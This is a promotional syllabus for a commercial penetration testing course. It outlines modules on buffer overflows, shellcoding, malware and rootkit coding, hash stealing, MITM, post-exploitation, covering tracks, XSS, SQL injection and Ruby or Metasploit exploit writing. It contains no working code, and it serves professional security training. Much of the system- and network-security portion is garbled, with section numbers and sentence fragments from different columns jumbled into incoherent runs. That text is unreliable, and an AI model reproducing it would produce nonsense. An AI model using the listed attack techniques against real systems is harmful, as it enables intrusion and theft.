Penetration testing Professional
The World’s Premier OnlinePenetration testing course PTPv3 at a glance:  Self-paced, online, flexible access  4500+ interactive slides and 14+ hours of video material  Five top level authors  Five knowledge domains  In depth coverage of every technique  Two virtual labs for Network, System and Web application security hands-on sessions  Dozens of real world vulnerable networks and websites  Reporting skills covered in depth  Prepares for eCPPT certification  Prepares for real world Penetration testing jobs This training course has been chosen by students in 120 countries in the world and by leading organizations such as: Course home page: http://www.elearnsecurity.com/course/penetration_testing/ System security section will provide you with thorough understanding of x86 Architecture and its weaknesses. - Module 1: Introduction   - Module 2: Cryptography and Password Cracking    - Module 3: Buffer Overflow  Module 4: Shellcoding  Module 5: Malware  Module 6: Rootkit coding  In this module, you will learn basics of C++, ASM and x86 Architecture. Sample source codes of C++ and Assembly language are provided in order to get the student familiar with these languages. Advanced buffer overflow exploitation, shellcoding and rootkit coding will require compilers and assemblers that you will get familiar with in this module. 1. Introduction 1.1. Dev-Cpp 1.1.1. Using Dev-Cpp 1.1.2. C++ Video 1.2. Nasm Assembler 1.2.1. NasmX Assembler Introduction 1.2.2. X86 Stack 1.2.3. PUSH and POP 1.2.4. EBP/ESP functionality 1.3. Immunity Debugger 1.3.1. Sample Driver 1.3.2. Compiling your Driver 1.3.3. Using a Driver 1.3.4. Viewing Driver Output Hera Labs are included in this module Almost all penetration test engagements require the understanding of cryptographic topics. This module will ensure that you are current with the most common cryptographic technologies, algorithms and tools. You will also learn how to perform 2 2. Cryptography & Password Cracking 2.1. 
Introduction 2.2. Classification 2.3. Cryptographic Hash Function 2.4. Public Key Infrastructure 2.5. PGP 2.6. Secure Shell (SSH) 2.6.1. SSH Tunneling 2.7. Cryptographic attacks 2.8. Security pitfalls in implementing advanced password cracking using the best tools available. A thorough review of the most modern tools used to steal and crack Windows password hashes is provided. Finding and exploiting buffer overflows in real world applications is what you will learn during this incredibly handson module. A hard topic made easy through examples explained step by step starting from the very basics of stack manipulation. Armed with assemblers, compilers and debuggers, the students will learn how to hijack the execution of applications. At the end of the module, the student is exposed to the most modern techniques used to prevent Buffer overflows and the main methods to bypass them. Cryptography Systems 2.9. Windows Passwords 2.9.1. LM and NT hashes 2.9.2. SAM 2.9.3. Stealing hashes – Remote 2.9.4. Stealing hashes – Local 2.9.5. Stealing hashes – Live host 2.9.6. Stealing hashes – Offline 2.9.7. Pass the hash 2.9.8. Cracking the hash 3. Buffer Overflow 3.1. Introduction 3.2. The Stack 3.2.1. X86 Stack Frames Samples 3.3. Buffer Overflows 3.3.1. Gaining control of EIP 3.3.2. Steps to trigger the Overflow 3.4. Finding Buffer Overflows 3.4.1. Fuzzing 3.4.2. Identifying Buffer overflows after a crash 3.5. Exploiting real world Buffer Overflows 3.5.1. 32Bit FTP Client exploitation 3.6. ASLR and DEP 3.6.1. ASLR – Brute forcing 3.6.2. ASLR – NOP Sleds 3.6.3. ASLR – Non randomized memory 3.6.4. DEP Hera Labs are included in this module 3 3. Percentage encoding you will actually create your own 4. Shellcode encoding 4. API Hooking 5. Anti-Virtual machine methods .The art of Shellcoding is made available to anyone through easy to understand samples and real world complex scenarios. 4.7. a Trojan and a Virus. Anti-Debugging methods 5. Finding kernel32.2. 
Sample Driver Framework code for Kernel privilege escalation Hera Labs are included in this module A thorough and detailed classification of types of malware is the introduction to a module featuring the most advanced and obscure techniques used by modern malwares.2.8. Sleep() Shellcode and assemblers. Hooking SSDT 5.1. Execution of Shellcode 4.6. Resolving references at runtime shellcode. Malware 5.6.3. Null free shellcode A small part of theoretical aspects will 4.2.5.3.8. Sample 2 : OS Independent shellcode Three source code examples are 4. The module is enriched as three malware source codes are dissected and explained: a Keylogger. Techniques used by Malware 5.5.2.1.1. IAT Hooking 5.2.2.1. 4.3. Streams 5.2.5. Setting up Windows for Debugging 4.2.6.2.3.5.3.1. Hooking IRP 5.1.2.6. 4 5.2. Hiding a process 5. Inline Hooking 5.8. Writing Universal Shellcode for Windows Different techniques are shown in 4.4. shellcodes 4.2. Sample 1 : Shellcoding framework shellcode through the use of compilers 4. The Driver Architecture 4. Sample 3 : Privilege escalation explained line by line. Types of Shellcode 4.4. 4.2.3.2. EAT Hooking 5.2. Alphanumeric shellcode introduce the practical examples where 4.3.2.8.7.dll address order to let you create your own 4.2. Shellcoding 4. The logic behind privilege escalation 4.4.5. Classification 5.1.8. 3. Real world Samples 5. Packers 5. Permutation 5.4. A brief classification will introduce you to 3 rootkit source code snippets uncovering the most used techniques used by rootkits.1.2.3.4.2.3.3. this module will cover the basics and the most important aspects of rootkit coding. Rootkits Classification 6.3.2. Polymorphism 5.2. Sample 3 : Virus From the creators of the first Windows 7 BIOS Rootkit.2.11. Alphanumeric shellcode 5. Metamorphism 5. How malware spreads 5. Obfuscation 5.4. Percentage encoding 5.2.2.2. Sample 3 : Hiding Files .11. Registers Exchange 5. 
You will be able to understand and code a rootkit yourself using the Windows Driver Development Kit and perform advanced covert penetration testing.3.2.1.2.8. Garbage Insertion 5.5.3.2.4.3.10. Sample 2 : Trojan 5.4. Sample 1 : Hiding a process 6. Sample 2 : Controlling File Access 6.11.9.1.1. 5 6. Rootkits 6.11. Null free shellcode 5. Sample 1 : Keylogger 5. Introduction 1.2. Information Gathering 1.3.2. Financial information 1.2.2.2.4.1.7.3. .3.2.2. DNS Enumeration 1.1.Module 3: Enumeration  .3. techniques and tools for networked PC and devices.1. Cached information 1.2. Netblocks 1.4. Netblocks & AS’s 1.4. Infrastructure Information gathering will deal with the enumeration of DNS.6. Domains 1. Tools 1. Information Harvesting 1.2.4.4. Alive hosts 1. netblocks and other web assets belonging to the organization.4. Infrastructure information gathering 1.Module 4: Sniffing and MITM attacks  .Module 5: Exploitation  . OSINT / Search Engines 1.2. Domains.Module 6: Post-exploitation . DNS Enum .2. DNS Enumeration 1.4.2.1. databases and specialized search engines.6.2.Network security section will deal with the security testing methodology. 6 1. esearchy 1.2. Finding government contracts 1. IP’s 1.Module 2: Scanning  . A Penetration tester will use the information collected during this phase to map the attack surface and increase his chances to breach the organization in the same way criminals do. sensitive and sometimes secret documents by means of free services.4.4.2.5.1.2.2. Students will learn how to get access to valuable. People search and investigation 1.Module 8: Social Engineering The Information Gathering module is the most important phase of the overall engagement.1.1.6. Partners and third parties 1. theHarvester 1.5. Organization Web Presence 1.1.2.1.Module 7: Anonymity . eLearnSecurity proposes an extremely thorough investigation methodology that takes into account the Business and the Infrastructure of the client.3.1.1. OSINT / Social Media 1.5. 
Job postings 1. Real world information gathering against eLSFoo 1.Module 1: Information Gathering  . 3.3.3. P0f Hera Labs are included in this module As one of the most important steps in the penetration test of a network.2.1.1.5.6. Passive/Active Fingerprinting techniques will also be covered in 2.2.1. open 2. Detecting services 2.5. Detecting Alive hosts and open Ports 2. Fierce 1.5.2.2.5.4. Foca & Shodan Hera Labs are included in this module. Other Tools depth.2.1. ACK scan other network protocols. Hping2 ports and services running on them.4. Connect scan 2.1.7.4.4. Nmap 2. 2.1. Timing completely stealth port scans against a 2.5.3. Fragmentation Through Nmap and Hping2.3.5.5. SuperScan We will then show you how to use the 2.2.1.3. 2.2. Amap 2.1.2.2. UDP scan If you are not a network expert.4.2. 2. Introduction 2. IP scan 2.2.1. Decoys learn how to find zombies to mount 2.1.3.4. DNS Map 1. you will 2.1. Scanning 2. The student is also required to conduct an investigation against a real company 2.2. Idle scan first chapters of this module will 2.2.3.2. Banner grabbing Passive and Active OS fingerprinting 2.2. the 2.2.3.2. 7 .1. UnicornScan 2.1. SYN scan 2. Using source ports target. 2.3.1. NULL / FIN / Xmas introduce you to the basics of TCP and 2.1. Firewall/IDS evasion techniques 2.2.2.5. this module will first teach you the theory behind port scanning and service reconnaissance. Win Enumeration best tools to detect live hosts. 1. Snmpenum 3.3. Snmpset 3.2. What it is 3.Scope of this module is to provide you with the techniques professional penetration testers employ to enumerate resources on target.3.3.2.2.1. Wireshark 4.2. SNMP 3.2.2.3. What sniffing means 4. MAC Flooding 4.3.1.3.3. Enumeration 3. Dsniff 4.3. You will be able to explore.3.4. What is NetBIOS 3. NetBIOS is the subject of the first part of this module: real world examples will be explained to show most important techniques and tools to enumerate remote Windows shares and printers. 
We will make sure you have enough basics of network theory before we 8 3.2. The student will then be introduced to attacks against the protocols through a number of common tools.2.2.1. NAT 3. NetBIOS commands and tools 3. Tcpdump .3.3. Onesixtyone 4.2. Passive Sniffing 4.2.3.4.4. Active Sniffing 4.1.4.3.1.5.2.3.2.4.2. Basics of ARP 4. How NetBIOS works 3.3.2. NetBIOS 3.2.1. Sniffing is a technique that you will be able to fully grasp in its most practical aspects.2. enumerate and map the remote network and its available services through a number of different Windows and Unix tools.2.6.4.2.2.3.1. MIB. Snmpbrute 3. Studying ARP. ARP Poisoning 4.4.3.3. Tools 4. Sniffing 4. SID2USER / USER2SID 3.2.3. Cracking community strings 3.2.2. How it works (Agents.2. You will also learn how to test for NetBIOS Null Sessions that still affect old Windows versions.1.2.3.4.3. Winfo 3.3.4. OID) 3.3. SNMP commands 3. Sniffing & MITM 4.3. Winfingerprint 3.3.2. how it works and how it can be manipulated to mount sophisticated attacks is made extremely easy to understand. Introduction 3. Snmpwalk 3. SNMP basics will be explained. SNMP Attacks 3.2.2. SSLStrip & Ettercap 5.1. Metasploit advanced use : Remote exploitation The module is video and lab intensive.1.3. Intro to Metasploit 5.3.1. Windows LM/NTLM/NTLMv2 weaknesses 5.3. MIB.3.3. Cracking network services: SSH.4.1. Man in the middle (MITM) attacks 4.4.4. ARP Poisoning for MITM 4. Hera Labs are included in this module 9 .1. Vulnerability Assessment 5. you will be able to mount man in the middle attacks within local networks and over the Internet.5.2.2. FTP… 5. Low Hanging Fruits 5.2.1. Metasploit and SET advanced use : Client Side exploitation againt Windows and Linux 5.3. SMB.3. DHCP Poisoning 4. Man in the middle attacks are one of the most used penetration testing techniques today.3.2. How it works (Agents.3.4.3. RDP. SNMP commands 4. 
Windows authentication protocols are dissected to demonstrate weaknesses and related attacks from Metasploit. VA & Exploitation 5.3. 4. Windump 4.3. OID) 4. Local to Remote MITM 4.3.7.3.3. The student is then immersed in common exploitation techniques used by today’s Penetration testers. Intercepting SSL traffic 4.2. What they are 4. Telnet. Nessus 5. VNC. This module will teach the student how to master Nessus in order to perform thorough and targeted Vulnerability scans with Nessus.4. MITM in Public Key exchance 4.3. Exploitation 5. to exploit client side and remote vulnerabilities in Workstations and Servers.6.cover actual attack scenarios using the best tools available.1. 1. Harvesting stored credentials Penetration testers must possess the 6.2.1. Pivoting 6.1. Mapping the Internal Network any kind of internal weakness that 6. Migration and Getsystem exploitation techniques.2. Maintaining access to the will be exposed to the cyclic steps of a compromised machine successful Post exploitation phase.4. Privilege escalation networks through advanced Post 6.1. Harvesting documents 6.4. Tor Network 7. Tunneling for Anonymity 7.2.5. Backdoors This is the phase where criminals 6.3.1. Crack / Pass the hash 6. Port scanning internal network This is a video and hands-on intensive 6.3.1. Determining machine role in the and ex-filtrate documents and remote network credentials from the organization.2.2. he 6.3. HTTP Proxies 7.2. Maintaining access and Privilege methodology to conduct thorough escalation Exploitation of remote internal 6.2.1.1. Further Pivoted Exploitation module 6.3.4.1. However there are times when testing the efficiency of the target organization incident response team is within the scope of a Penetration tester’s engagement.1.1.2. RDP / Telnet ensure stable high privileged access to 6.6. Browsing Anonymously 7.1.2. Data Harvesting the remote network in order to steal 6.2. 
Pass the hash Hera Labs are included in this module Penetration testers rarely need to cover their tracks. 6.2.4. 10 7.3.2. This module will teach techniques to perform your tests while covering your tracks. 6.2.3.5.2. 6.3.3. 6. Introduction to the Methodology have come up with a proven 6.3. Creating SSH Tunnels 7.2.1.5.2. Keylogging not only the perimeter security but also 6. ARP Scanning affects the organization security.4. Privilege Escalation on Win Server 2008 and Windows Once the student is comfortable with 7 most recent exploitation techniques.2.3.1.2. Post Exploitation eLearnSecurity experienced instructors 6. Anonymity 7. Cleaning traces .2. Harvesting web browsers data same skill-set and tools in order to test 6. 5. Samples of Social Engineering attacks 8.3. Pipl 8.6. Spokeo 8.2. What is Social Engineering 8. Phishing 8.1.2.2. Social engineering toolkit (SET) .2.1.3. Types of Social Engineering 8.3. Role of Social Networks in Social Engineering 8.Social engineering module will guide you through the most modern social engineering attack techniques.2.5. Almost one hour of video lessons will teach you everything you need to know to master the most important tool in the field: Social Engineering Toolkit. FBI E-mail 8. Pretexting 8.1. Canadian Lottery 8.2.5. Social Engineering 8.3.1.2.2.4. Baiting 8. Pretexting samples 8. Spokeo or Twitter. Real world attacks will be illustrated by exploiting the potential of social networks such as Facebook. Physical 8.4. 11 8. Module 3: Vulnerability assessment .Module 4: Cross site scripting .2.1.3.1.Module 6: Advanced Web Attacks This module will introduce you to the web application security field and its basic terminology.1.3. you will gather all the skills you need to move to more advanced modules. .3. Tools 1. Same origin policy 1.Module 5: SQL Injection . this lab intensive section will teach the student how to conduct a thorough Penetration test against web applications. 
Headers 1.Today’s Penetration testers have to master web application attack techniques. Burp Suite If you are already an advanced web application security tester. Sessions 1.1.2. Terminology 1. Introduction to Web Applications 1. you will get introduced to the methodology and tools followed throughout the course.Module 2: Information Gathering . Introduction 1. 1. Practice on Coliseum Labs 12 .1.1.Module 1: Introduction . If you are new to this field. 3. Information Gathering Web application information gathering 2. Fingerprinting Frameworks And so much information on your target Applications that exploiting it will be easy and fun.1.1. 2. Infrastructure 2. Typical HTTP Services At the end of this module. 2.1.6.1.2.2. Gathering Information On Target is a long and complex process. Fingerprinting Custom Applications 2.3.5.1. Fingerprinting Third-Party AddOns 2.1.2. you will have 2.2.5.1.2. DNS queries and zone You will learn the best methodologies transfers to collect and store information about 2.1. WHOIS tools 2. Log And Configuration Files 2.1.2.3.1. Using Nslookup your target web assets. Google Hacking Practice on Coliseum Labs 13 . 2.6.4.5. Enumerating users accounts with Burp Proxy 2.7. Mapping The Attack Surface 2. Webserver Modules 2. Crawling The Website 2. Finding Back Up And Source Code Files 2.1.1.1. IP Addresses And Email Addresses It takes insight and perseverance.5.5. Fingerprinting The Webserver This information will be used at later 2.1.2. Enumerating Resources 2.1. Relevant Information Through Misconfigurations 2. 2.1. Finding Hidden Files 2.3.2.1. Directory Listing 2.6.1. Fingerprinting steps in the exploitation process.2.4.2. Finding Owner.1. 3. you will finally steal session cookies. Vulnerability Assessment 3.2.1.3.5. Vulnerability Assessment 3. The three types of XSS 4.3.1. you will master the two most used open source tools.1.3.1. DOM-based XSS 4. to perform Vulnerability Assessment against web applications.2.3. Finding XSS in PHP code 4. 
This understanding will help you in the exploitation and remediation process. Reflected XSS 4.2.3. Cookie stealing through XSS 4.5. Practice on Coliseum Labs The most widespread web application vulnerability will be dissected and studied thoroughly. At first. you will master all the techniques to find XSS vulnerabilities through black box testing and within PHP code. XSS. This is a hands-on intensive module. Assessing vulnerabilities with Nessus 3. Later. Real world attacks 4. modify website DOM and perform advanced phishing attacks.2. Creating Nikto Modules At the end of this module.3. you will be provided with theoretical explanation.1.5.1. Browsers and same origin policy 4.2. XSS Exploitation 4. Vulnerability assessment VS Penetration testing 3. Anatomy of a XSS exploitation 4. 14 4. Defacement 4. Nessus and Nikto.2. You will also be capable of customizing Nikto to make it current with the latest vulnerabilities.4. Real world exploitation examples will conclude the module. Basics 4.4. XSS 4.1.2.3.3. Persistent XSS 4. Finding XSS 4. Nikto 3.5.1.1.5.5. This step is absolutely necessary when the remote web server is in the scope of the tests or when the target uses third party web applications. Cross site scripting 4.2.1.1. Advanced phishing attacks .Vulnerability Assessment is the process through which you will uncover all the vulnerabilities in the remote system. Exploiting Error Based SQL Injections 5. Accessing the remote network 5.1.1.1.4.2.1.5. Reading remote file system 5. Tools will be covered in depth and a taxonomy will help the student to pick the right tool according to the environment and scenario he will face in real engagements.4.2. Finding Blind SQL Injections 5.6.1. BSQL Hacker.6. Exploiting Blind SQL Injection 5. SQLmap.2.5. SQL Injection 5.1.3.3. Time Based SQL Injections 5.1.6. 5.1.2.5. How to find SQL injections 5.2. Tools 5. From the explanation of the most basic SQL injection to the most advanced.2. Dangers of a SQL Injection 5. 
Introduction to SQL Injection 5.Practice on Coliseum Labs This module will contain the most advanced techniques to find and exploit SQL Injections. Exploiting Union SQL Injections 5. Optimized Blind SQL Injections 5.2. Dumping database data 5. You will not be able to just dump remote databases but also get root on the remote machine through advanced SQL Injection techniques.4.4. How to find SQL injections 5. Tools taxonomy This is a video and hands-on intensive module Practice on Coliseum Labs 15 .2. SQL Injection Exploitation 5.1. How SQL Injection works 5. Pangolin 5. Advanced methods will be taught with real world examples and the best tools will be demonstrated on real targets.3. 2.2. Dissecting Ajax API’s Ajax API’s.0 attacks 6.3.3. Introduction applications are the subject of this 6. applications logic 6.5.3. Exposed administrative functions Practice on Coliseum Labs 16 . 6. Web 2. 6.1.5. you will learn how to 6.3.4.1. 6.5.5.4. frameworks and exposed 6.2. Finding CSRF vulnerabilities.0 applications by dissecting 6. File Inclusion Vulnerabilities A working exploit will be created step 6.1. HTTP Session Fixation 6. Local File Inclusion by step to demonstrate a CSRF 6.2.5. They will be covered in 6.5. How Ajax works Last but not least.4. Preventing CSRF 6.3. Preventing Session Fixation Session Fixation and CSRF are often 6.2.1. Exploiting CSRF depth. Defeating httpOnly – XST & Ajax audit web 2. CSRF underestimated and overlooked 6.3.6.5. Session attacks module.2. Advanced Web Attacks Sophisticated attacks against web 6. Reverse engineering Ajax functionalities.1. Remote File Inclusion vulnerability found in a famous CMS.4.2. Interactive calculator 1. Once the student masters the Ruby programming language and its features. Ruby from a file 1. installing gems and much more.Module 5: Ruby Advanced: Pentester prerequisites  . the student will see how to install and configure the environment in order to work with Ruby.1.1.2.1. 
Ruby gems 1.1.1.Module 9: Ruby for Pentesters: Exploitation with Ruby .1.3. Variables and Scope . The student will also learn the basic concept of Ruby such as data types.3.3.1.2.1. Data Types .1. Windows Installation 1. Getting started 1.2.1. Interactive Ruby 1. Other system 1.1.1.3. Installation 1.2.2.1. .Module 10: Ruby for Pentesters: Metasploit In this first module of the Ruby section.1. this section covers topics such as exploit vulnerable application with Ruby as well as creating and editing Metasploit modules.1.Module 1: Ruby Basic: Installation and Fundamentals . Libraries 1.Module 2: Ruby Basic: Control structures .1. Suggestions 1. 17 1.1. Installation and Fundamentals 1.Module 3: Ruby Basic: Methods.2.1. Suggestions 1. Suggestions 1.Module 4: Ruby Advanced: Classes.4.1.4. Once the environment is configured. Power of Ruby 1.Module 6: Ruby for Pentesters: Input / Output .2.1.3.3.2.Ruby for Pentesters and Metasploit section covers Ruby programming techniques from the very basics to advanced and penetration testing topics. Ruby from command line 1. Ruby one liners 1.3.Module 8: Ruby for Pentesters: The Web .2.1. Installation & First Look 1.1.Module 7: Ruby for Pentesters: Network and OS interaction . Modules and Exceptions . using the interpreter.4. the student will learn the very basic concepts of Ruby such as running and writing scripts.1. variables declarations and more.1. Float 1.1. Some useful methods 1.2. Strings 1.7.2.5.2.2. Interpolation 1.2.4.4.4.1.3. Integer 1.3.2.2.5. Multi-dimensional array 1. Numbers 1.2.2.4.2. Ranges & Hashes 1.10. “Here document” notation 1.3.6.2.3. Info about strings 1. Ranges (fundamental) 1. Variables and arrays 1.2.4. Alternative Ruby Quotes 1.2.2.3. String arithmetic 1. 18 .3.3.2.1. Array and Strings 1.1. Deletion 1.2.2.5. Array creation 1. Anticipation 1.3.2. Multi-typed array 1.1.2.1.2.2.2.5.3.4.2.2.4.7. Some useful methods 1.1.2. Comments 1.2. Operations between arrays 1.2.3.2.2. Numeric 1.2.6.2.2.2. 
Hashes (methods) Downloadable scripts are included in this module.2. Stack 1. Insertions 1.2.11. Ranges (methods) 1. Single or Double quotes? 1.3.4.2.2.2. Ranges and variables 1.1.3. Hashes (fundamental) 1.3. Arrays 1.2.3.1.2.2.9.2.3.3.4.8.1.1.2.4. Accessing array elements 1.2. With the introduction of methods and blocks.3.3. while 2. redo 2.4. a very important topic needs to be covered: the scope. if 2. In this module.1.4. break 2. alias 3.2. unless 2. Variables & Scope 3.1.1. Parentheses 3.6.4. External iterators 2.2. bang methods 3. some consideration 2. In this module.2.1.2.2.3.3. blocks.5. Methods.2. until 2. Methods 3.1. variable length arguments 3. Iterators 2.3.1.1. block arguments 3.4. returned values 3. Variables Types 3.4. Enumerable objects 2. This will allow the student to create scripts and programs that are not limited to a linear sequence of statements. 2.4.4.5. local variables 3.6.1.1.1.5.2. Control Structures 2.1. Altering structured control flow 2. the student will learn how to write and define different types of Ruby control structures.1.3. BEGIN / END Downloadable scripts are included in this module.1.4. case 2.4. for 2.2. Loops 2.5. Conditionals 2. parameters default values 3.1.7. This is useful for creating very powerful tools and scripts. Ternary operator 2.One of the most important program structures that a programmer has to master is the ‘flow control structure’. the student will learn how to define and use Ruby methods.5.2.8.3. Iterators & Enumerators 2.2.3. Conclusion 2.3.2.3.2.1. aliases and more.2. 19 3.4.5. Simple method definitions 3.9.2.1. Enumerator 2.2. Every program must be clean and have reusable structures. next 2. Variables and Scope 3.1. hashes as arguments 3. Comparison operator 2.5. global variables . 5. Along with these topics. Classes principles 4.2. 20 4. Specialize a method 4.3. Simple Rescue 4. RuntimeError 4.1.2.2.3.4.3.3. functions.1.3. Mixin 4.1.5.1.3.1. Namespace and Mixin 4. Mutable/Immutable values 4. 
With that said.1. private methods 4.5.1. A simple class 4.1.5. namespaces and much more. Modules 4.4.7. Ruby is an Object Oriented Programming language.8.4.1. mixin.1. Rescue 4. Getter/Setter through Metaprogramming 4.5.2.2.2. exceptions are a very useful topic that needs to be mastered in order to take control of the program behavior. an OO program involves classes and objects. In this module. Simple extensions 4.3. protected methods 4.2. Classes.1.1.2.10. Method visibility 4. Operator methods 4. Exception Objects . Other Errors 4.3. we will start covering more advanced topics and we will see how to define and use classes.6.5.4.1. Modules and Exceptions 4.3. Subclassing & Inheritance 4.1.1. modules. Protected methods 4. Constants 4. Raise 4. Constants 4. Class Variables 4.6. Class Methods 4. More about classes 4.5. Private methods 4. CustomError 4.3.3.2.2.1.2.3.1.2. Instance variables 4. Methods overriding 4.9.2.4. A full view 4.2.4.2. Namespace 4.5.5.7. Exception 4.2. Open classes 4.6.1. Instance & Class Variables 3. Constants 3.1.1.2.5.5. Some tricks Downloadable scripts are included in this module.3. we will also see how to handle exceptions.4.1. Instance and Class Variables 4.1. 1.2. Regex is widely used in the security field.3. network communication and so on. More about regexp 5.5.5. Comparisons 5.1.1.1.3.3.2.2. Character classes 5. Time class 5.4.1. Regexp object 5. Create a time instance 5. we will focus on how to use Ruby for penetration testing purposes.1.2.5.1.2.2. create and so on. Anchors 5. Working with string 5.1. it can be used for many different purposes. One of the first topics we will cover is ‘Regular Expression’.1.2.2. delete.4.1.2.3.1.1. Regular expressions 5.4. Type based Exception handling 4.1.1.2.2.1.1.1.6.1. Regular expressions in the Ruby 5.1. Alternatives 5. Repetition 5.1. Global Variables 5.3.3.1.1.3.2.7.3.5.2.1.5. A quick example 5.1.1. retry 4.1.2. Ruby is much more Downloadable scripts are included in this module. Sequences 5. 
A real world example 5.2. The point 4. From time to string .1.6.3. it is used to find and locate important information stored in files. else 4.2.2.5. 21 5.3.6. Special characters 5.5.1. A good knowledge of how to use and define regex is a ‘must’ for a penetration tester! During the study of this module. Groups 5. Other clause 4. Regexp modifier 5.2.4.6.2.5. Match method 5.1. Basic concepts 5. From this module on.2.1.1. Dates and time 5.1.2.1.5. web pages. Methods. Classes and Modules 4.2. the student will also learn how to use date and time classes as well as manage and interact with files and directories: read. Predicates and conversions 5.1. Arithmetic 5. Conclusion 4.1.4.2.5.4.1.3.2. Ruby is a very powerful programming language and thanks to its many features.6. Pentesters Prerequisites 5.3.1.1. Regular Expressions Syntax 5. ensure 4. Rescue as a statement modifier 4. Components of a time 5.8.2. Normal format 6.2.2. Files 5. filter and store important information.2.4.4.1.3.3. Writing to a file 6.2.1.2.2.3. Grepable format 6. Change Directory 5.3.1. 6.4. Ip extraction 6. Normal format 6.1.2.2.1. All together 6. Reading from a file 6.2.2.2.1.3. Testing Files 5.1. Current Directory 5.5.1.3. Input / Output 6. the student will learn how to use different input and output mechanisms and techniques in order to find (read) or store (write) information to and from files.3.2. XML format 6.2.1. We will see several examples and scripts that can be used in conjunction with other tools (i.2. Example: Windows application directory listing 5.3. Directories 5. Grepable format 6.2.2.1.2.2. Conclusion Downloadable scripts are included in this module 22 . Dir Objects 5. File Stream 6.1.3.2. Other classes 5.3.2.1.6.3.3.4.2.1.1.3.4. Change permission 5.3.1. Directory Listings 5.5. Create/Delete/Rename 5.7.3.1.1.3. Testing Directories 5. Working with names 5.2. Conclusion Downloadable scripts are included in this module In this module.2. Open port extraction 6. 
Files and Directories 5.2.1.2.2.1.2.3.3. Working with NMAP Files 6.1. nmap) in order to gather.1.e. Creation / Deletion 5. XML format 6. All together 6.3.2. 1.1. In the following module.2. Sockets and blocks 7. Forge a packet (the best way) 7. Connection 7. The Server 7. Execution 7.1. The strategy 7. as well as send and run specific commands).1.2.2. backdoors that are able to retrieve information from remote systems. Net-Ping Gem 7.1.1. Handle the result 7.2.3.3.1.2.1. More about 7.1. The script 7.2.1.1.3.4.3.1.2. Thanks to many useful examples and scripts. A Wireshark view 7. intercept network communications.3.2.3.1.3.1. RFC868 7. Installation 7.1.2. UDP Port scan 7. The script 7. Socket Basics 7.1.1.3. Tcp SYN port scanner 7.1. The script 7.1. Conclusion 7.1.1. Ping sweep 7.2. The Client 7.1.1. the student will learn how to create raw sockets.2.1.3.1. More about 7. UDP behaviour 7.3.1.1. OS interactions .1.Another very important topic that a penetration tester should master is ‘network communication’.1.6.2.3.1. PacketFu 7.1.1.1.2. The script 7. forge packets.1.2.1.1.1.5.1.1.1.1.1.1.2.3.1.2.2.2.1. the student will learn how to use the power of Ruby in order to create.1.2.1.2. TCP Connection Port scan 7.1.1.1.4. This.1. The strategy 7.2. Forge a custom packet 7.4.1.1.1.1.e.1.2.1. UDP client 7.1. A Wireshark view 7. Network and OS Interaction 7. may be useful to create powerful tools (i.2.3.1. TCP client 7. forge. we will also see how to interact with local and remote Operating Systems.1.1. The strategy 7. Usage 7.2.1.1. Handle the result 7.1.1.1.1. Datagram sending/receiving 7.1. in conjunction with the network communication skills.1.2.6. The network 7.1. In this module. RFC868 7.3. Penetration testing activities 7.1.3.1.1.3.1.1.1.4.2.1.2.2.1.3.5.1.1.3. create TCP/UDP scanners and much more.2.3.2. 23 7. Raw Sockets 7.1.2.1. TCP Client/Server service 7.2.3. 2.2. Ruby's alternatives 8. Parameters 8.4.4.2.2.2. 
the student will study network communications and local interactions with the OS.1.2.7. Starting point 8.1.2.2.3. Status 8.2.2.5.1.2. the student will be also presented with some useful scripts and use cases useful to run attacks against web application or identify vulnerabilities such as XSS. Kernel exec Kernel system Kernel backticks IO popen Open3 popen3 All together Downloadable scripts are included in this module. Url encapsulation 8.2.1.2. Request & Response 8.2. Using simple socket 8.2.2.3. Net::HTTP library 8. Request Headers 8.2.3. The Web 8.2.4.3.2. We will see how to create and intercept HTTP and HTTPS requests and responses. In the previous module.2.2.1.2.6.2.1. URI object 8. Response object types 8. Net::HTTP class and instances 8. 7. URI and parameters 8. HTTP Protocol 8. 7. Dynamic parameters 8.3.3.1.2.2.4.2. Headers 8.6.3. Net::HTTP get_response 8.4. Hera Labs are included in this module.2. 24 8.3.6. Using get Instance method 8.1. GET 8.2.5.2.4.5. HTTPResponse object 8.1.2.2. Along with these topics.2.1. 7.2.2.1. Using Http::Get request object 8.5.2.2.2.2.1.2.2.2.6.2.1.2.2.2.1. 7.2.2.3.2. Body 8.2.2. Net::HTTP instances 8. Using Http::Get request object .2. Using get Instance method 8. as well as how to send/read GET and POST parameters and much more. Net::HTTP get 8.5.1.2.2.2.1.2. 7. Open-uri library 8. Now it is time to focus on Web Applications.2. 5.2.3.4.2. Open method 8. Follow the chain 8.8. Other Verbs 8.2.2.3.4.2.8.3.1.1. Documentation & Tutorials 8.1.2.6.1.1.1. Using Http::Post request object 8.3.1.2. Example: Form extraction 8.3. Data extraction 8.1.9.7.3.2.2.2. HTTPS 8.2.2.3.1.4.3.2.2.1.3. Conclusion 8.2. Example: Post flooding 8.2.2.2. Https Proxies 8.2.2. Using post Instance method 8. Example: Bruteforce login form 8.3.2.2.4.4.2.1.3. Using Http::Post request object 8. Request Headers 8.1.3. Find a UserName 8.2.1.2.2.3.8.2.2.7. Proxies 8.1.2.2. Installation 8. Using a dictionary 8.7.3.3.7.8.3.6.3.3.8.3. Sessions and Cookies 8.2.4. 
9. Exploitation with Ruby

During the study of the previous modules, the student should have acquired many Ruby programming skills. It is time to take advantage of these skills and use Ruby in order to write exploits for vulnerable services and software. In this module, we will present a vulnerable application that the student can use to learn how to write a full working exploit.

Topics:
- Preamble
- ELS Echo Server: The service; Files and Folders; The vulnerability
- Bug detection: Fuzzing; Using a debugger; Identify the buffer overflow space; Return address; Nops
- The Exploit: Write the script; The payload (Writing the payload, Create the payload); Shell on the victim; The full code
- Exploitation; Conclusion

Hera Labs are included in this module. Downloadable scripts are included in this module.
10. Metasploit

Now that the student has mastered Ruby and its features, it is time to start working with one of the most powerful Ruby tools: Metasploit. In this module, the student will study the Metasploit architecture and the framework, and will learn how to create, add or edit custom Metasploit modules. Thanks to our virtual labs, the student will also have the chance to practice against real vulnerable machines.

Topics:
- Introduction: A snapshot
- Architecture and Framework: Architecture; Libraries (Rex, Core Library, Base Library); Interfaces (MSFConsole, MSFCli, Web interface); Modules (Exploits, Auxiliary, Post, Payloads, Encoders, Others); Tools; Plugins
- Exploitation with Metasploit: ELS Echo Server (The service); Explore and write the ELS Echo module (Module type and location, Module high level structure, Module Information, Targets considerations, The check method, The exploit method, Some considerations, The point)
- Meterpreter scripting: Meterpreter Basic API; Meterpreter scripts
- Conclusion

Hera Labs are included in this module. Downloadable scripts are included in this module.

Wi-Fi Security

